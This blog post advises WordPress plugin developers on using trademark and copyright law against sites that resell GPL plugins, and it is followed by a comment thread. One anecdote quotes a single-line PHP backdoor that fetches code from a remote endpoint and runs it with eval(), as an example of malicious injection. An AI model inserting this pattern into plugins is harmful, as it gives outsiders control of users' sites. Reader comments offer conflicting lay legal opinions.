Software licensing can be very confusing subject, especially in the open-source world. Boundaries of legality and ethics aren’t always clear. But as business owners focused on selling WordPress GPL plugins, it’s our duty to understand these topics thoroughly.
This post will not address ethics and will focus on the legal considerations. It will provide you a step-by-step actionable formula, including feedback from experienced attorneys in this space, to protect your WordPress business against plugin ‘trolls.’
As a plugin developer for the past five years, I’ve read tons of articles discussing the GPL, its freedoms, and the challenges associated with running a GPL-compliant business. But in the last few months, this topic has become even more significant for me.
In August, a Twitter account named WordPress Plugins (https://twitter.com/plugswp) followed me. As a matter of habit, I checked their profile to learn more about that user. I soon discovered that the handler was associated with ‘wppluginscheap.com,’ a plugins & themes ‘troll’ that touts itself as “the number 1 source for Cheap Premium WordPress Plugins and Themes.” Browsing the site, I found many popular premium plugins like Yoast SEO, Backup Buddy, WP Robot, and 50 premium themes. Each product sold for less than $10.
Naive as I was, I hopped on WPChat and started a new thread:
We’ve been all coding under the threat that some troll will pop-up and re-sell our GPL plugins / themes for ridiculous prices. Well… it’s here How about buying Yoast Premium SEO for $4.00… I’m a little pissed off and on the other hand amused since I knew it will show up some day.
I asked the community two questions:
1. How do we get it taken down?
2. Do you feel threatened?
In parallel, I went to Advanced WordPress Facebook group, and uploaded the following status:
Joost de Valk and Thomas Höfter unless you guys started to sell your plugins for under $10, I think these guys violate your trademarks (and dozen of other plugin developers). How do we get it down?
If you are a member of the AWP group, you can check the whole thread here.
Both of the threads generated a lot of interest and discussion. I received 17 replies in WPChat and 84 comments in the AWP Facebook group. Once the replies started to pile up, I realized two things:
1. WordPress plugin / theme trolls are an epidemic – it’s happening everywhere!
This has been happening for a LONG time, although mostly with themes and WooCommerce addons. See gplclub.org and sozot.com. WPAvengers.com did something similar before they shut down.
– Leland Fiegel, Founder of WPChat
2. Even though there are hundreds of blog posts about every aspect of the GPL license, there’s still a lot of confusion in the ecosystem. Even among influencers. It seems like many people think it’s technically OK (albeit unethical) to do it since plugins and themes are licensed under the GPL.
These opportunists pop up every now and then and never seem to amount to anything. It’s legal (the GPL part, anyway) but unethical. It’s lazy. And it’s bad for the customers because the goods are in questionable shape, outdated, unsupported and suspicious.
– Steven Gliebe, Theme Developer and Founder of Pro Plugin Directory
It is unethical, however if me as a theme/plugin shop owner releasing under GPL I would say that, I feel that I am even more unethical if I can say this than those guys, and a total hypocrite.
– Ionut Neagu, Founder of CodeinWP
Other comments received on Facebook included:
- If the plugins were licensed under GPL, then I’m afraid that they can’t do anything
- I don’t think the premium versions are under GPL
- It’s legal, under the GPL
And there are much more of those!
So before we start, let me clear something —
This is completely wrong!
Developers still have enforceable rights even if their plugins are distributed under an open source license.
These ‘Plugin Trolls’ may still be liable for trademark infringement and/or copyright infringement.
I want to add that I’ve read plenty of opinions saying that no harm is done to the business by those trolls. If that was the case, I wouldn’t bother spending so much time compiling this post. I would like to take the opportunity to explain the reasons why trolls are bad for the WordPress community – for your business and also for WordPress users.
Why are plugin trolls bad for your plugins business?
Whether you like it or not, a chunk of users will purchase or get your premium plugin from this websites. Especially WordPress newbies. If I was new to the WordPress ecosystem and looking for an SEO plugin, Yoast SEO for $4 sounds way more appealing than the full price. I would just buy it. Just like I always search for the best discount when I’m purchasing a smartphone or other products. I don’t need the “original warranty” since I never used it with any of the products I purchased, so support is not something that users have in mind right from the start.
If there are any problems with the plugin purchased from the troll – guess who is blamed for that? Of course the real developer/company. If the artwork associated with your brand is replicated, customers will contact you. Just like if I purchased an HTC smartphone on Amazon, when I have issues with the device I call HTC technical support, not Amazon. What would you tell the user? “Yes, it’s our phone, but you need to contact Amazon for technical support.” This response would be hard for a user to digest It will look like you are not standing behind your products.
If there are any problems with the plugin purchased from the troll – guess who is blamed for that?Tweet
There is no question that some trolls inject malicious code into the plugins. The main incentive to do this is to generate revenues while distributing the premium plugins for free. I’ve witnessed this myself. Two years ago, I was approached by a senior SEO guy from a BIG U.K. based agency (over 100 employees). . He offered to partner with me by adding one simple line of code to our plugin:
eval(wp_remote_get( 'http://www.company.com/path/to/api/endpoint/' )[‘body’]);
The idea was that the API endpoint will return hidden URLs to push their portfolio companies’ backlinks. One of the examples he sent was:
<a href="”http://www.portfolio-company.com”">Great Company</a>
Trolls may inject malicious code into plugins while using your original branding, a direct damage to your brand!Tweet
This was before Google Penguin and was a great SEO hack. And the offer was also fantastic – $0.1 per domain per month. So if I had 100,000 active domains using my plugin, I could generate $10,000 / mo. revenues without spending an extra minute. Awesome right? Obviously we didn’t do it, for various reasons, primarily because this code was EXTREMELY malicious. It opens a remote backdoor to do anything you want with the site. Even if the agency was only intended to use it for SEO, what happens if their server is hacked and someone with bad intentions takes control? Who knows how many legitimate WordPress.org plugins did partner with that agency… Getting back to the trolls, their intentions are purely financial. They don’t promote your premium plugins for fun, they want to make money. And if they do illegal stuff like copyright and trademark infringement, nothing stops them from generating alternative revenue streams like code injections. Oh, and I forgot to mention that if something like that happens you are the one to be blamed! It’s your product, and your brand.
Subscribe and grab a free copy of our
WordPress Plugin Business Book
Exactly how to create a prosperous WordPress plugin business in the subscription economy.
Share with a friend
Enter your friend's email address. We'll only email them this book, scout's honor.
Thank you for sharing
Awesome - a copy of 'The WordPress Plugin Business Book' was just sent to . Want to help us spread the word even more? Go on, share the book with your friends and colleagues.
Thanks for subscribing!
- we just sent your copy of 'The WordPress Plugin Business Book' to .
Have a typo in your email? click here to edit the email address and send again.
Why are plugin trolls bad for users?
For many of the same reasons I mentioned, but from the user’s perspective.
When facing a technical issue, the troll just can’t help you out. It’s not their product, they have no clue about the code or how to solve any related problems. Moreover, they don’t have the support resources to do it. And if you’ll try to contact the original company, premium plugin developers have the infrastructure to keep track of their customers. The company often won’t help you until you purchase an original license.
Illegal redistributors of plugins can’t and won’t help you out with technical issues.Tweet
No Automated Updates
Most premium plugins on the market today have a licensing and updates mechanism (trolls often ‘hack’ this part before redistributing the plugin). The way this automatic updates mechanism works is that once in every 24 hours, the plugin checks the original company’s server to see if there are any updates for the premium version. It also authenticates with a license key. Since the troll’s plugin was never issued with a license key from the original company, this updates mechanism will NOT work. Therefore, every time a non-original premium plugin is installed, there are no automatic updates. This is bad since hackers are constantly finding new creative vulnerabilities and an outdated premium plugin could be that security leak.
Pirated WordPress plugins don’t have automated updates mechanism – constant security vulnerability!Tweet
Major Security Leaks
Remember the malicious one line of code I mentioned above? Would you like to have a backdoor to your site open to hackers? This backdoor literally enables a hacker to modify every pixel and piece of content on your site. And that’s only one example, I’m sure there are many other creative injections out there.
What do open source licenses cover?
Since there’s clearly a lot of confusion about these issues in the developer community, I reached out to my friend, Ariel Reinitz and his colleague Matthew Hintz who are Intellectual Property (IP) (patents, trademarks, and copyrights) attorneys at Lowenstein Sandler LLP, a nationwide firm with offices from New York to Palo Alto.
Ariel explained to me that while WP plugin ‘trolls’ may technically be entitled to redistribute code that is under an open source license (e.g., GPL), there are other intellectual property (‘IP’) rights that are not covered under the open source license which these ‘trolls’ may still be infringing.
Here’s what Ariel has to say about the GPL:
It’s important to understand what the open source license (GPLv2) under which most WordPress plugins are distributed, does (and doesn’t) cover:
An open-source license dictates how software/source code is to be distributed. Generally, such licenses allow anyone to use, modify, etc., the software/code at no cost. Thus, the source code of an open source project can be redistributed by other parties without violating the terms of the GPL.
In simple words – the GPL freedom allows anyone to take the source code and do whatever he wants with it, including distribution. I believe that there’s a consensus on that part in the community.
What don’t open source licenses cover?
However, open-source licenses (including the GPLv2) do not generally extend to trademarks. Trademarks pertain to the manner in which a product (e.g., a plugin, theme, app, etc.) is branded – e.g., the name of the product (and/or the company from which it originates), its tagline/slogan, and/or its logo. Thus, while the source code of a project may be freely redistributable under an open source license, such a license does not grant others any rights with respect to the trademarks associated with the project (e.g., the product’s name, the company that developed it, etc.).
In non-lawyer words – the GPL doesn’t allow to use any of the plugin’s trademark like the product’s name, company name, and logo. Ariel gives us an example:
So, for example, if a third party redistributes a WordPress plugin using all of the project’s original branding (e.g., promoting it with the original name, logo, etc., of the company/project), this would likely infringe the original developer’s trademark rights. As noted, the open source license does not allow someone to use someone else’s branding in a commercial context. This is important because one of the main principles of trademark law is to protect the consumer from confusion as to where a product is coming from.
The main principles of trademark law is not only to protect the business, it’s there to protect the consumer from confusion as to where a product is coming from. That’s important note!
It’s also important to recognize that many open-source companies register, protect, and police their trademark rights. Examples include: Linux, MySQL, Red Hat, and WordPress.
What Ariel is saying here is that many of the biggest names in open-source protect and police their trademark rights. Why shouldn’t we do the same?
If Red Hat can protect and police their trademark rights, why can’t plugin developers?Tweet
In addition to trademark rights, Ariel pointed out that developers are also entitled to copyright protection on materials they produce which are not part of the source code:
It’s also important to recognize that the GPL (and other open-source licenses) only cover the source code of the plugin itself. But, if the developer creates materials that aren’t part of the source code (e.g., graphics, promotional materials, packaging, etc.), those materials wouldn’t fall under the GPL and the developer would have no obligation to allow another party to redistribute the materials.
For example, take a look at how the ‘Yoast’ plugin is featured in some of the ‘troll’ sites referenced above. While those sites may technically be able to redistribute Yoast’s source code (as it falls under the GPL), these sites also incorporate elements such as Yoast’s branding (e.g., Yoast’s name and logo, which are trademarks) as well as other creative materials developed by Yoast (e.g., the graphic of the guy drinking tea which is not part of Yoast’s source code and thus the copyright is owned by Yoast and not subject to the GPL).
So – while the troll may be legally entitled to redistribute Yoast’s source code, the GPL (or another open source license) does not give them the right to use (a) Yoast’s branding (trademarks) or (b) other graphics, materials, etc., (copyrights). Since they’re not part of the plugin’s source code, these items do not fall under the GPL and therefore the intellectual property (IP) rights to these items are the sole property of the developer.
Since the plugin ‘trolls’ are using the developer’s trademarks and copyrighted materials (like in the ‘Yoast’ examples above), there are legal procedures (as we’ll explore in detail below) that developers can use to enforce these rights in order to stop, dissuade, or at least attempt to limit the impact these ‘trolls’ can have on your business. Again, this is true even though your plugin is distributed under the GPL.
What is protected by trademarks?
Matthew explains what trademarks cover:
Simply put, a trademark is a unique identifier to consumers that distinguishes the source of goods or services from others. Most often, a trademark is a word, logo, or some combination of those elements. In the United States, trademark rights begin with use in commerce (called “common law rights”), not through registration with the United States Patent & Trademark Office (USPTO). However, registration of your trademark with the USPTO provides the owner many benefits not available through common law rights. Notably, these include evidence of the registrant’s exclusive right to use a mark throughout the United States in connection with the goods or services set out in the registration, constructive notice that the registrant is the owner of the trademark, listing of the registration in the USPTO’s online database, and ability to use the ® symbol. (Prior to registration, a TM symbol can be used with a trademark.)
Is code protected by a trademark?
During my research, I read a few posts mentioning that when forking a GPL licensed plugin or a theme, the code must be refactored to make sure there are no functions that include the trademarked identifier as part of the function name. To clarify that, I asked Matthew if code is also protected by the trademark, and here’s the answer:
Code itself is not protected by trademark.Trademarks protect the word or logo that a consumer associates with your goods or services. A limit to trademark protection for a plugin then would be to the word or logo used to market the plugin to consumers. And then the fundamental test for trademark infringement is whether consumers would likely be confused by the similarity of the two marks. Similarity is assessed by looking at things like visual and phonetic similarity, how closely related the goods/services for each mark are, how distinctive the marks are, and how long the marks have been used.
To clarify the answer in a developer-friendly language:
- Class names, function names, variables names and constant names are NOT protected by trademark.
- On the other hand, strings that are printed onto the page and visible to the end users – are protected by trademark.
How to file a trademark registration?
To obtain the benefits of the federal registration of a trademark, your trademark must be registered with the USPTO. An application to register must include basic information: name of the applicant/owner, the mark, the goods or services that the mark is used with, evidence of use of the mark with those goods or services, and dates of first use of that mark. Considerations for your application:
- Search the USPTO’s TESS (http://www.uspto.gov/trademark ) database for same or similar marks. If same or similar marks are applied for or already registered, these can be the basis for a rejection of your application. Also search via Google or other search services since a mark could be used without registration and have superior rights in that mark despite your registration. Registration does not exhaust a prior user’s trademark rights.
- For describing your goods or services, search the USPTO’s ID Manual for acceptable language: http://tess2.uspto.gov/netahtml/tidm.html. You can also search for acceptable language on TESS.
- Classes are general indications relating to certain fields for goods or services. For example, downloadable plugins are usually in Class 9 which covers all computer programs and software.
- The fees for a trademark application are determined by the number of classes. The general fee is $275 per class, but lesser and more expensive filing options are available.
After an application is filed, the USPTO will examine the application to determine if the mark is a unique identifier (i.e., not descriptive or confusingly similar to prior filed applications or registrations). The USPTO provides timelines for applications: http://www.uspto.gov/trademark/trademark-timelines/trademark-application-and-post-registration-process-timelines.
Keep in mind that trademark protection is territorial. For example, a registration in the United States will provide trademark protection in the United States.
As Matthew described, the process isn’t necessarily complex – but it does take time and effort. I would recommend paying a mid-level lawyer to do it for you. It should cost you between $200-$2,000 for the work, though it will save you time and ensure a better application. In any case, before you start, Google it! If you find a product or a company (particularly in the same or similar field) matching your exact term / phrase, there’s a good chance you will NOT be able to register the trademark (and you may actually being violating someone else’s’ 🙂 ).
What to do when your trademark is infringed?
I’ll start with what you should NOT do – if it’s a trademark infringement, not a copyrights, you should NOT file a DMCA takedown.
DMCA covers ONLY copyright infringement. No similar provision is available for trademarks. Using DMCA takedown notices for trademark claims can result in the claimant being liable for false statements.
It is generally simplest to attempt to resolve matters directly with the website owner. If this is unsuccessful, you can initiate legal action against the website owner, host, etc. The specific approach you take will likely be case specific and at this point, I’d suggest contacting an attorney to understand the best option in your specific circumstances.
What is protected by copyrights?
Copyright is different than trademark. Copyright protects original works of authorship fixed in some medium of expression. However, a limit to copyright protection is that it extends only to the expression, not the idea. Categories of works for copyright protection include literary works (books, code), musical works, photographs and images, motion pictures, sound recordings, among other categories. Another limit is that copyright does not protect short phrases or expressions – that remains for trademark protection, so long as those function as unique identifier to consumers that distinguishes the source of goods or services from others.
What to do when your copyrights are infringed?
- Initially, it’s often simplest to attempt to contact the website owner directly. In many cases, the website owner is no more interested than you are in enlisting lawyers, becoming involved in legal proceedings, etc. Try to find the twitter account, contact email or contact page on the site, and send a message demanding the removal of your trademarked plugin from the website.
- If it doesn’t help, you can send a DMCA takedown notices (Digital Millennium Copyright Act). There are bunch of generators to help you create one, just google for “dmca takedown generator”. Once you have the notice, you’ll need to send it to the site owner, hosting company and ISP. You can optionally submit a notice to the search engines as well to remove the site from the search results. To find the hosting company you can use websites like whoishostingthis.com. To find the ISP you can use websites like http://www.whoismyisp.org/. To find the relevant link to file the DMCA to the ISP / Hosting, google for ISP_NAME / HOSTING_NAME + DMCA.
Alternatively, you can initiate legal action against the website owner, host, etc. I suggest contacting an attorney to understand whether this is or isn’t the best option in your specific circumstances.
I hope this set of step-by-step instructions empowered you with the right tools to protect your GPL plugins business against trolls. Just a recap:
- As a business owner, you are eligible, and should protect your company’s brand and assets.
- Trademarks and copyrights are relatively cheap & effective ways to legally protect your plugin business. Therefore, you should strongly consider registering trademarks for your company’s name and product names.
- Many trolls infringe both copyrights (e.g., by lifting your promotional graphics) and trademarks (by using your brand name). By creating a unique brand name, logo and artwork, you generate a portfolio to help fight against copyright infringement.
Many trolls infringe both copyrights and trademarks. By creating a unique brand name, logo and artwork, you generate a portfolio to help fight against copyright infringement.Tweet
If a 3rd party website lists your premium GPL plugin or theme, for sale or giveaway, without your consent:
- If the website is using your original artwork or other materials – that’s likely copyright infringement. You can file a DMCA takedown.
- If the website is using your company’s or product’s trademark, it’s likely trademark infringement. You can initiate legal proceedings against the website.
If you have any additional thoughts about the legal and ethical implications of the GPL, feel free to share it in the comments below.
- DMCA Takedown Notice Issued Against Fork Of WP Migrate DB Pro
- The GPL License Doesn’t Provide The Freedom To Infringe Registered Trademarks
- Is the WordPress GPL Being Abused?
- Why Are We Paying For GPL Licensed Code?
Hey Vova! Great article. Thanks so much for sharing.
Regarding your statement about finding a “mid-level lawyer,” do you have any suggestions or referrals to help a small business find an appropriate lawyer? What would you recommend someone looks for? Do you think it’s better to work with a local lawyer that’s more of a generalist, or to establish a relationship with a larger (presumably more expensive) firm that specializes in this area?
This is a great overview. One other suggestion would be to register your copyright in your code and your marketing materials with the U.S. Copyright Office. See http://copyright.gov/circs/circ01.pdf#page=7. In general, registration gives a copyright owner the right to file a lawsuit in the U.S. if necessary. If the copyright is registered within a short time after first publication, the copyright owner also has potential for additional remedies in a lawsuit.
If you are looking for a lawyer to assist you in this type of situation, I would look for someone who specializes in intellectual property law rather than a general corporate lawyer. These are primarily federal statutes, but you might want or need the lawyer to be licensed to practice law in your state, particularly if there could be state law claims as well as federal claims. You could search the web for a lawyer referral service in your county.
As @David mentioned, you would like to work with Intelectual Property lawyer. Ping me on Facebook and I’ll refer you to an affordable lawyer from the bay area that filed ‘Freemius’ trademarks.
Hello, thank you very much, we need posts like that, so unclear for me.
But let me ask you a question, if someone took my code (under GPL), all my code, and removed the trademarks (like MyBrand became HisBrand), then replace all the pics, and then resell my plugin as a “new” plugin, including a new feature that i don’t have.
If i’m right, it’s 100% legal. Can you confirm that? Thanks
Yes – it is legal.
Hi Vova, another great article – posting this to my Evernote Plugin-Dev for future reference. Good stuff.
Thanks Tom! Happy I made it to your Evernote 🙂
Just yesterday I came against https://wpspring.com/ and thought it’s both sad and funny they abuse the GPL like this.
There are many there if you google it like https://gplchimp.com and https://gplhero.com. There are few others who have just compiled all woo plugins and created a bundle of it like wp avengers started. But there is always a risk of outdated and infected scripts.
One clarification. The DMCA notice and takedown procedure is for material posted to a site by its users, not the site operator. For example, YouTube can avoid copyright infringement liability by complying with the DMCA safe harbor. The website operator itself gets no protection from copyright infringement claims if the website operator is the one that posts the infringing material. A premium plugin developer should consider talking to an IP lawyer before sending a DMCA notice to a site that posts the developer’s marketing material.
By far, the best article on this topic I have came across so far. Detailed, informative and well written. Thank you!
Having said that, if you’d like your free plugin version to be hosted on WordPress.org, the guidelines require 100% GPL code (including the CSS & JS).
Great stuff. Only thing I thought to add was that plugins’ code, images, data — everything — uploaded to W.org must be compatible with GPLv2 or later, per https://wordpress.org/plugins/about/guidelines/
However, theme requirements are worded slightly differently: https://make.wordpress.org/themes/handbook/review/required/#licensing
Just good things to be aware of. Of course, premium items aren’t uploaded to W.org
So great article in that it brings up issues I hadn’t seen raised anywhere else in this debate. However, in the interest of completeness I have to bring up an opposing view. To clarify I’m not a lawyer and this is not legal advice, but I have successfully represented myself when suing someone over copyright infringement of my work and won so I have a little experience in this area. And yes I realize copyright and trademark are legally distinct.
So now to my counter argument. First, Fair Use doctrine.
For easy reference refer to:
(No I did not cite Wikipedia in my case, but I don’t feel like looking up case law at the moment.)
So, basically, within limits, you can use someone’s trademarked material in order to identify them when the trademark is necessary for identification. Copying their sales page obviously doesn’t fall into this category, but using their name does.
Second, I would take partial issue with this statement.
“It’s also important to recognize that the GPL (and other open-source licenses) only cover the source code of the plugin itself. But, if the developer creates materials that aren’t part of the source code (e.g., graphics, promotional materials, packaging, etc.), those materials wouldn’t fall under the GPL and the developer would have no obligation to allow another party to redistribute the materials.”
While it may be true that “the developer would have no obligation”, it is not true that ” the GPL (and other open-source licenses) only cover the source code of the plugin itself”. For reference see the GNU site itself.
While GPL isn’t recommended for these kinds of work, it can apply to them and to avoid this it must be ‘clear what constitutes the “source code” for the work’.
And finally there is the Google Thumbnail case and copyright fair use (which is distinct from the above mentioned trademark fair use). For reference see:
Under this example using a thumbnail of a logo may be considered fair use. And if you really dig into fair use you find some interesting factors, specifically:
That first one would be a hard hurdle to jump. If you’ve already licensed you work under GPL giving people the right to distribute it, then it’s a little hard to say that any copyright infringement associated with doing that is going adversely affect the value of your work. I’m not saying it’s not possible, but the bar becomes a lot higher.
If you look at the second one, copying an entire article into the comment section was upheld as fair use. Obviously, a comment isn’t the same as a site, but combine it with the effect of value above and the bar gets higher.
And that last one is even more interesting. There’s no case law that I know of specifically regarding the gpl community in general or the WordPress community specifically, but the OpenCourseWare community may be relevant. In either case, I’m guessing an argument could be made that within this community these sites have generally been considered to be unethical, obnoxious, and objectionable, but not infringing on the rights of the owner. I’m sure most would like to argue that point, but I’d challenge you to compare this communities reaction to these site with the RCAA and MPAA that actively go after copyright offenders and the active and free sharing of content on wordpress.org among other sites. Specifically, I’d refer you to not only the comments referred to in this article, the articles talking about GPL on many plugin and theme sites which virtually say we don’t like you but have at it, but also the lack of DMCA notices on Google searches that these sites appear in. If nobody ever files DMCA take down notices of these sites, not for hosting the software mind you but for copying the sales copy, images, etc., then it could be argued that this is an accepted if not wholly endorsed practice within this professional community.
Feel free to flame this comment to hell, but by virtue of this being a great article that brings up points not addressed elsewhere I think it’s necessary for readers to get an opposing and therefore more complete view. None of this should be read as an endorsement of or moral or ethical defense of these sites. Merely an opposing legal argument.
Wow, you win. Everything you said confirms my lay understanding of the issues. There’s a reason these sites are numerous (and getting away with it.) If Trademark issues (screenshots, etc.) were paramount, you wouldn’t see these sites doing it with reckless abandon.
And another thing 🙂
I just posted a comment at WP and Legal stuff that referenced my above comment so hopefully that one gets approved 🙂 (http://wpandlegalstuff.com/how-to-apply-the-gpl-to-your-themes-and-plugins-and-avoid-getting-in-the-shi/#comment-13875)
However that article on WP and Legal Stuff and this one…
…made me think of two additional factors. First, in reference to that first article, under GPL when distributing you are required to make it clear who the copyright holder of the original code is. Therefore, this will also make it more difficult to claim trademark infringement when the license explicitly says that you are required to notify people where the code originally came from.
Second, take all my arguments in the above comment and add in a free version in the Plugin Repository. (This doesn’t apply to Themes because all Themes in the repository and their paid versions must be GPL). The requirements for posting a plugin in the WP repository is that all aspects of the plugin (including images, css, etc.) must be GPL compatible. Given that in most cases most if not all of the non-source code assets in the paid version are the same as in the free version, those assets can therefore be used under the GPL even if later included in the paid version. (reference the second WP and Legal Stuff article.)
Take all that into account (including my comment on WP and Legal Stuff) and you start to realize why so many of the big developers aren’t aggressive about this. You would have to jump through so many hoops to be able to successfully take legal action in any of these cases that it’s arguably more profitable to just keep developing so fast that people are willing to pay the fee for continuous automatic updates that they wouldn’t get from these other sites.
At the end of the day, it’s WordPress that needs to change their licence to protect the industry.
Without that you have to have tonnes of money and some ‘luck’ to get anything even to court. Ironically also if the site TOU says you have to sue them in their country, you can’t take them to the USA court system either as this then becomes a breach of their terms (ironically). So you can’t sue locally as they can simply point to their TOU which you agreed to by using the site and tell you the jurisdiction that you can settle the matter.
You mention finding the hosting provider to send a DMCA notice to.
What to do if the hosting provider comes up Cloudflare? They are totally unwilling to directly enforcement a DMCA or any other legal complaint, only leaving it up to the recipient to decide whether or not to comply with the notice.
Cloudflare advertises themselves as a “pass through” service and denies all responsibility for customer content.
Indeed ClodFlare is not the hosting provider. To find the real server IP you’ll need to pull the DNS details of the domain. You can use sites like http://dns-record-viewer.online-domain-tools.com
You can also submit a DMCA at Google to remove the site from their search results.
The root cause of this entire problem is Matt, the douchebag owner of WordPress. He likes to claim he’s a crusader for GPL when in fact he’s lining his own pockets with the hard work of thousands of developers. That’s same Matt who refuses to provide a plugin store, or even an update mechanism, in the WordPress repository. It would be nice to see a successful fork of WordPress itself that could take over Matt’s market – I’m sure he’d quickly decide that GPL is evil after all.
The trademark issue is not quite that simple. If a product (theme/plugin zip file) released under GPL is subsequently redistributed *unmodified* by a third party, then the product trademark isn’t being infringed. Just as a corner store can sell branded goods (physical products) without a trademark license from the manufacturer, provided they don’t alter or repackage the product.
Secondly, if a premium theme or plugin is forked/modified, under trademark nominative use doctrine the new product can reference the original product trademark to denote compatibility or functional equivalence. This only permits using the word(s) of the trademark, not graphical logos.
Almost EVERY other open source ecosystem encourages using split licensing for premium products – GPL for program code and proprietary license for HTML, CSS & images. Unfortunately Matt Mullenweg, Automattic & the brainwashed WordPress community denounce split licensing and insist on 100% GPL themes and plugins. Small businesses who legally protect their WP products using a split license model get attacked and banned from WordPress.org and WordConf 🙁
Kris is this true? They can use my company name? They can not use my graphic logo but they can use my name in text; How can this be true? The example they gave above Yoast. I read that to mean they can NOT use the Yoast’s name via words or graphics. Can you point to where you read this. Also, does anyone know how this applies for trademarks outside the USA. Are trademarks only valid in the country issued?
Destroying any paywall or restrictions of code distribution of themes/plugins is in the DNA of WordPress community as set up by Matt Mullenweg/Automattic. Automattic is a HOSTING company. As a hosting company it resists anything that comes between users and unrestricted access to anything WordPress related. To set an example for the rest of the community, Matt literally tried to financially destroy Chris Pearson and ruin his reputation. Even if you have everything (js, graphics, art work) as GPL in wordpress.org but if you have a split license on your own site( or somewhere else), your plugin gets de-listed on wordpress.org( at least that is what I have read/heard). Developers are third class citizens in WordPress world.
In the WordPress world, the hosting companies are on top of the food chain. Software is a commodity to be kept at zero price as much as possible.
To be practical – I think if you are not happy with your software being exploited and distributed without your consent I recommend reporting these sites to the domain registrars and hosting companies where the sites are hosted and file a trademark violation against them. There’s a good chance that they will be suspended from the hosting account and the site taken down.
Great article!!!!! It’s really helpful for me. Thank You
it’s amazing what these “trolls” can get away with. I have a loooong list of “pirate sites” that sell or distribute some of my themes without my consent.
When I have some time I message them and try to persuade them to take it down. I managed to reason with one or two but it’s normally a hopeless and time-consuming effort.
As long as there is a market for these hacks, they will continue to troll your hard work to make a few bucks. Educating users on the risks of purchasing from these trolls and the benefits of purchasing from the original authors may help combat this problem along with going after them for trademark infringement. Will it solve the problem 100%? I doubt it, but it will promote more users to buy the real deal.
Like you mentioned when someone buys a premium plugin or theme from one of these trolls they do not get the support or automated updates associated with the plugin or theme like you would from the original author. So, is it really worth purchasing from these trolls? IMO, the answer is no. WordPress changes so frequently, that updates are necessary to maintain the plugin/theme functionality as well as security. So anyone purchasing these knockoffs is taking a huge risk. Not to mention the possibility of these trolls injecting code that affect the performance of your site or even worse open a back door that leads you susceptible to hacking. I personally would mu h rather pay the premium price from the original author knowing exactly what I am getting and knowing that they provide the support to back it up.
If you price your product reasonably, I’m sure nobody would venture to buy from gpl sites, knowing fully well that they’re most likely to inject malicious code. Mind you there are a lot of products in the marketplace which don’t deserve the price tag they have in place.
The freemius SDK code that I need to add to my WordPress theme is licensed under GPLv3. I also use other code licensed GPLv2 and GPLv2 or later. According to GNU (https://www.gnu.org/licenses/gpl-faq.html#AllCompatibility) I must release my project under GPLv3 if I want to incorporate code licensed under GPLv3. This means the freemius SDK requires that I release my theme under GPLv3, too. Correct so far?
The problem is: If that’s the case, I can not incorporate any code released as GPLv2 only (without “or later”), as GPLv2 and GPLv3 are incompatible according to GNU. Is this correct, too, or do I still have a way to incorporate GPLv2 only code while using freemius?
Hi Chris, great question — licenses can be confusing sometimes! To answer it, if you license your theme using GPLv2 or later, you can use GPLv2, GPLv2 or later, and GPL3 libraries. Hope that helps.